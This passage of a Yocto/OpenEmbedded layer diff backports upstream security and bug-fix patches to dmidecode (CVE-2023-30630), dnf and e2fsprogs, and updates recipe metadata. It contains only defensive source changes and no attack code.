+ 	if (opt.flags & FLAG_DUMP_BIN)
+ 	{
+@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 32);
+ 		overwrite_dmi_address(crafted + 0x10);
+ 
++		dmi_table_dump(table, len);
+ 		if (!(opt.flags & FLAG_QUIET))
+ 			printf("# Writing %d bytes to %s.\n", crafted[0x05],
+ 				opt.dumpfile);
+ 		write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
+ 	}
++	else
++	{
++		dmi_table_decode(table, len, num, ver, flags);
++	}
++
++	free(table);
+ 
+ 	return 1;
+ }
+ 
+ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ {
++	u16 ver, num;
++	u32 len;
++	u8 *table;
++
+ 	if (!checksum(buf, 0x0F))
+ 		return 0;
+ 
++	ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
+ 	if (!(opt.flags & FLAG_QUIET))
+ 		printf("Legacy DMI %u.%u present.\n",
+ 			buf[0x0E] >> 4, buf[0x0E] & 0x0F);
+ 
+-	dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
+-		((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
+-		devmem, flags);
++	/* Maximum length, may get trimmed */
++	len = WORD(buf + 0x06);
++	num = WORD(buf + 0x0C);
++	table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
++			      devmem, flags);
++	if (table == NULL)
++		return 1;
+ 
+ 	if (opt.flags & FLAG_DUMP_BIN)
+ 	{
+@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 16);
+ 		overwrite_dmi_address(crafted);
+ 
++		dmi_table_dump(table, len);
+ 		if (!(opt.flags & FLAG_QUIET))
+ 			printf("# Writing %d bytes to %s.\n", 0x0F,
+ 				opt.dumpfile);
+ 		write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
+ 	}
++	else
++	{
++		dmi_table_decode(table, len, num, ver, flags);
++	}
++
++	free(table);
+ 
+ 	return 1;
+ }
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
+From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:25 +0100
+Subject: [PATCH] dmidecode: Write the whole dump file at once
+
+When option --dump-bin is used, write the whole dump file at once,
+instead of opening and closing the file separately for the table
+and then for the entry point.
+
+As the file writing function is no longer generic, it gets moved
+from util.c to dmidecode.c.
+
+One minor functional change resulting from the new implementation is
+that the entry point is written first now, so the messages printed
+are swapped.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
+  pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
+ util.c      | 40 -------------------------------
+ util.h      |  1 -
+ 3 files changed, 51 insertions(+), 59 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index d6eedd1..b91e53b 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ 	}
+ }
+ 
+-static void dmi_table_dump(const u8 *buf, u32 len)
++static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
++			  u32 table_len)
+ {
++	FILE *f;
++
++	f = fopen(opt.dumpfile, "wb");
++	if (!f)
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("fopen");
++		return -1;
++	}
++
++	if (!(opt.flags & FLAG_QUIET))
++		printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
++	if (fwrite(ep, ep_len, 1, f) != 1)
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("fwrite");
++		goto err_close;
++	}
++
++	if (fseek(f, 32, SEEK_SET) != 0)
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("fseek");
++		goto err_close;
++	}
++
+ 	if (!(opt.flags & FLAG_QUIET))
+-		printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
+-	write_dump(32, len, buf, opt.dumpfile, 0);
++		printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
++	if (fwrite(table, table_len, 1, f) != 1)
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("fwrite");
++		goto err_close;
++	}
++
++	if (fclose(f))
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("fclose");
++		return -1;
++	}
++
++	return 0;
++
++err_close:
++	fclose(f);
++	return -1;
+ }
+ 
+ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 32);
+ 		overwrite_smbios3_address(crafted);
+ 
+-		dmi_table_dump(table, len);
+-		if (!(opt.flags & FLAG_QUIET))
+-			printf("# Writing %d bytes to %s.\n", crafted[0x06],
+-			       opt.dumpfile);
+-		write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
++		dmi_table_dump(crafted, crafted[0x06], table, len);
+ 	}
+ 	else
+ 	{
+@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 32);
+ 		overwrite_dmi_address(crafted + 0x10);
+ 
+-		dmi_table_dump(table, len);
+-		if (!(opt.flags & FLAG_QUIET))
+-			printf("# Writing %d bytes to %s.\n", crafted[0x05],
+-				opt.dumpfile);
+-		write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
++		dmi_table_dump(crafted, crafted[0x05], table, len);
+ 	}
+ 	else
+ 	{
+@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ 		memcpy(crafted, buf, 16);
+ 		overwrite_dmi_address(crafted);
+ 
+-		dmi_table_dump(table, len);
+-		if (!(opt.flags & FLAG_QUIET))
+-			printf("# Writing %d bytes to %s.\n", 0x0F,
+-				opt.dumpfile);
+-		write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
++		dmi_table_dump(crafted, 0x0F, table, len);
+ 	}
+ 	else
+ 	{
+diff --git a/util.c b/util.c
+index eeffdae..2e1931c 100644
+--- a/util.c
++++ b/util.c
+@@ -247,46 +247,6 @@ out:
+ 	return p;
+ }
+ 
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
+-{
+-	FILE *f;
+-
+-	f = fopen(dumpfile, add ? "r+b" : "wb");
+-	if (!f)
+-	{
+-		fprintf(stderr, "%s: ", dumpfile);
+-		perror("fopen");
+-		return -1;
+-	}
+-
+-	if (fseek(f, base, SEEK_SET) != 0)
+-	{
+-		fprintf(stderr, "%s: ", dumpfile);
+-		perror("fseek");
+-		goto err_close;
+-	}
+-
+-	if (fwrite(data, len, 1, f) != 1)
+-	{
+-		fprintf(stderr, "%s: ", dumpfile);
+-		perror("fwrite");
+-		goto err_close;
+-	}
+-
+-	if (fclose(f))
+-	{
+-		fprintf(stderr, "%s: ", dumpfile);
+-		perror("fclose");
+-		return -1;
+-	}
+-
+-	return 0;
+-
+-err_close:
+-	fclose(f);
+-	return -1;
+-}
+-
+ /* Returns end - start + 1, assuming start < end */
+ u64 u64_range(u64 start, u64 end)
+ {
+diff --git a/util.h b/util.h
+index 3094cf8..ef24eb9 100644
+--- a/util.h
++++ b/util.h
+@@ -27,5 +27,4 @@
+ int checksum(const u8 *buf, size_t len);
+ void *read_file(off_t base, size_t *len, const char *filename);
+ void *mem_chunk(off_t base, size_t len, const char *devmem);
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
+ u64 u64_range(u64 start, u64 end);
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
+From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:31 +0100
+Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
+
+Make sure that the file passed to option --dump-bin does not already
+exist. In practice, it is rather unlikely that an honest user would
+want to overwrite an existing dump file, while this possibility
+could be used by a rogue user to corrupt a system file.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
+
+Backport Changes:
+- Ignored changes in man/dmidecode.8 file.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index b91e53b..846d9a1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -60,6 +60,7 @@
+  *    https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
+  */
+ 
++#include <fcntl.h>
+ #include <stdio.h>
+ #include <string.h>
+ #include <strings.h>
+@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
+ 			  u32 table_len)
+ {
++	int fd;
+ 	FILE *f;
+ 
+-	f = fopen(opt.dumpfile, "wb");
++	fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
++	if (fd == -1)
++	{
++		fprintf(stderr, "%s: ", opt.dumpfile);
++		perror("open");
++		return -1;
++	}
++
++	f = fdopen(fd, "wb");
+ 	if (!f)
+ 	{
+ 		fprintf(stderr, "%s: ", opt.dumpfile);
+-		perror("fopen");
++		perror("fdopen");
+ 		return -1;
+ 	}
+ 
diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
 SUMMARY = "DMI (Desktop Management Interface) table related utilities"
 HOMEPAGE = "http://www.nongnu.org/dmidecode/"
+DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
 SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
            file://0001-Committing-changes-from-do_unpack_extra.patch \
+           file://CVE-2023-30630-dependent_p1.patch \
+           file://CVE-2023-30630-dependent_p2.patch \
+           file://CVE-2023-30630.patch \
            "
 
 COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"
diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
+From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:51 +0200
+Subject: [PATCH] Keep installed packages in upgrade job
+ (RhBug:1728252,1644241,1741381)
+
+In combination with marking of job as TARGETED it prevents from
+reinstalling of modified packages with same NEVRA.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1728252
+https://bugzilla.redhat.com/show_bug.cgi?id=1644241
+https://bugzilla.redhat.com/show_bug.cgi?id=1741381
+
+Closes: #1474
+Approved by: m-blaha
+
+
+Backport to fix bug in dnf in oe-core
+from https://github.com/rpm-software-management/dnf
+
+Removed spec file portion of patch
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ dnf.spec                  | 4 ++--
+ dnf/base.py               | 3 ---
+ dnf/module/module_base.py | 2 +-
+ 3 files changed, 3 insertions(+), 6 deletions(-)
+
+diff --git a/dnf/base.py b/dnf/base.py
+index b2ced61..628c154 100644
+--- a/dnf/base.py
++++ b/dnf/base.py
+@@ -1968,9 +1968,6 @@ class Base(object):
+                 obsoletes=q.installed().union(q.upgrades()))
+             # add obsoletes into transaction
+             q = q.union(obsoletes)
+-        # provide only available packages to solver otherwise selection of available
+-        # possibilities will be ignored
+-        q = q.available()
+         if reponame is not None:
+             q.filterm(reponame=reponame)
+         q = self._merge_update_filters(q, pkg_spec=pkg_spec)
+diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
+index 976d730..ce70f63 100644
+--- a/dnf/module/module_base.py
++++ b/dnf/module/module_base.py
+@@ -214,7 +214,7 @@ class ModuleBase(object):
+ 
+             if not upgrade_package_set:
+                 logger.error(_("Unable to match profile in argument {}").format(spec))
+-            query = self.base.sack.query().available().filterm(name=upgrade_package_set)
++            query = self.base.sack.query().filterm(name=upgrade_package_set)
+             if query:
+                 sltr = dnf.selector.Selector(self.base.sack)
+                 sltr.set(pkg=query)
+-- 
+2.7.4
+
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
 DESCRIPTION = "Software package manager that installs, updates, and removes \
 packages on RPM-based Linux distributions. It automatically computes \
 dependencies and determines the actions required to install packages."
+HOMEPAGE = "https://github.com/rpm-software-management/dnf"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
                     file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
                     "
 
-SRC_URI = "git://github.com/rpm-software-management/dnf.git \
+SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
            file://0001-Corretly-install-tmpfiles.d-configuration.patch \
            file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
            file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
            file://0030-Run-python-scripts-using-env.patch \
            file://Fix-SyntaxWarning.patch \
            file://0001-set-python-path-for-completion_helper.patch \
+           file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
            "
 
 SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
diff --git a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
index e4ab113391..4bd4aef099 100644
--- a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
+++ b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
@@ -22,7 +22,7 @@ EXTRA_OECONF = "--without-udev --enable-compat-symlinks"
 
 CFLAGS += "-D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
 
 # Add codepage437 to avoid error from `dosfsck -l`
 RRECOMMENDS_${PN}_append_libc-glibc = " glibc-gconv-ibm437"
diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
 SUMMARY = "Package maintenance system from Debian"
 LICENSE = "GPLv2.0+"
+HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
+DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
 SECTION = "base"
 
 DEPENDS = "zlib bzip2 perl ncurses"
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
                                 file://tweak-options-require-tar-1.27.patch \
 "
 
-SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383"
-SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8"
+SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
+SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
 SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
 
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
 
 #include <argp.h>
 #include <stdio.h>
+#include <stdlib.h>
 
 #include <dwarf.h>
 #include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
 int
 main (int argc, char **argv)
 {
-  char* args[3];
+  char* args[5];
   int res = 0;
   Dwfl *dwfl;
   Dwarf_Addr bias;
   
-  if (argc != 2)
+  if (argc != 2) {
     fprintf(stderr, "Usage %s <file>", argv[0]);
+    exit(EXIT_FAILURE);
+  }
   
   // Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
   // dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
   args[0] = argv[0];
   args[1] = "-e";
   args[2] = argv[1];
+  // We don't want to follow debug linked files due to the way OE processes
+  // files, could race against changes in the linked binary (e.g. objcopy on it)
+  args[3] = "--debuginfo-path";
+  args[4] = "/not/exist";
   
-  argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl);
+  argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
   
   Dwarf_Die *cu = NULL;
   while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
 fixing, configuring , and debugging ext2 filesystems."
 HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
 
-LICENSE = "GPLv2 & LGPLv2 & BSD & MIT"
+LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
 LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
 LICENSE_e2fsprogs-e2fsck = "GPLv2"
 LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
 SECTION = "base"
 DEPENDS = "util-linux attr"
 
-SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git"
+SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
 S = "${WORKDIR}/git"
 
 inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:45:06 -0500
-Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
-
-If directory has been deleted in pass1[bcd] processing, then we
-shouldn't try to rehash the directory in pass 3a when we try to
-rehash/reoptimize directories.
-
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
----
- e2fsck/pass1b.c | 4 ++++
- e2fsck/rehash.c | 2 ++
- 2 files changed, 6 insertions(+)
-
-diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
-index 5693b9cf..bca701ca 100644
---- a/e2fsck/pass1b.c
-+++ b/e2fsck/pass1b.c
-@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
- 		fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
- 	if (ctx->inode_bad_map)
- 		ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
-+	if (ctx->inode_reg_map)
-+		ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
-+	ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
-+	ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
- 	ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
- 	quota_data_sub(ctx->qctx, &dp->inode, ino,
- 		       pb.dup_blocks * fs->blocksize);
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 3dd1e941..2c908be0 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
- 			if (!ext2fs_u32_list_iterate(iter, &ino))
- 				break;
- 		}
-+		if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
-+			continue;
- 
- 		pctx.dir = ino;
- 		if (first) {
--- 
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Wed, 13 Sep 2017 19:55:35 -0700
-Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
-
-The dir's mode has been set by ext2fs_mkdir() with umask, so
-reset it to the source's mode in set_inode_extra().
-
-Fixed when source dir's mode is 521, but tarball would be 721, this was
-incorrect.
-
-Upstream-Status: Submitted
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- misc/create_inode.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/misc/create_inode.c b/misc/create_inode.c
-index 8ce3faf..50fbaa8 100644
---- a/misc/create_inode.c
-+++ b/misc/create_inode.c
-@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
- 
- 	inode.i_uid = st->st_uid;
- 	inode.i_gid = st->st_gid;
--	inode.i_mode |= st->st_mode;
-+	/*
-+	 * The dir's mode has been set by ext2fs_mkdir() with umask, so
-+	 * reset it to the source's mode
-+	 */
-+	if S_ISDIR(st->st_mode)
-+		inode.i_mode = LINUX_S_IFDIR | st->st_mode;
-+	else
-+		inode.i_mode |= st->st_mode;
- 	inode.i_atime = st->st_atime;
- 	inode.i_mtime = st->st_mtime;
- 	inode.i_ctime = st->st_ctime;
--- 
-2.10.2
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:37:34 -0500
-Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
- rehashing
-
-In e2fsck pass 3a, when we are rehashing directories, at least in
-theory, all of the directories should have had corruptions with
-respect to directory entry structure fixed.  However, it's possible
-(for example, if the user declined a fix) that we can reach this stage
-of processing with a corrupted directory entries.
-
-So check for that case and don't try to process a corrupted directory
-block so we don't run into trouble in mutate_name() if there is a
-zero-length file name.
-
-Addresses: TALOS-2019-0973
-Addresses: CVE-2019-5188
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-CVE: CVE-2019-5188
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
----
- e2fsck/rehash.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index a5fc1be1..3dd1e941 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
- 		dir_offset += rec_len;
- 		if (dirent->inode == 0)
- 			continue;
-+		if ((name_len) == 0) {
-+			fd->err = EXT2_ET_DIR_CORRUPTED;
-+			return BLOCK_ABORT;
-+		}
- 		if (!fd->compress && (name_len == 1) &&
- 		    (dirent->name[0] == '.'))
- 			continue;
-@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
- 			continue;
- 		}
- 		new_len = ext2fs_dirent_name_len(ent->dir);
-+		if (new_len == 0) {
-+			 /* should never happen */
-+			ext2fs_unmark_valid(fs);
-+			continue;
-+		}
- 		memcpy(new_name, ent->dir->name, new_len);
- 		mutate_name(new_name, &new_len);
- 		for (j=0; j < fd->num_array; j++) {
--- 
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
+From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 27 May 2022 14:01:50 +0530
+Subject: [PATCH] CVE-2022-1304
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
+CVE: CVE-2022-1304
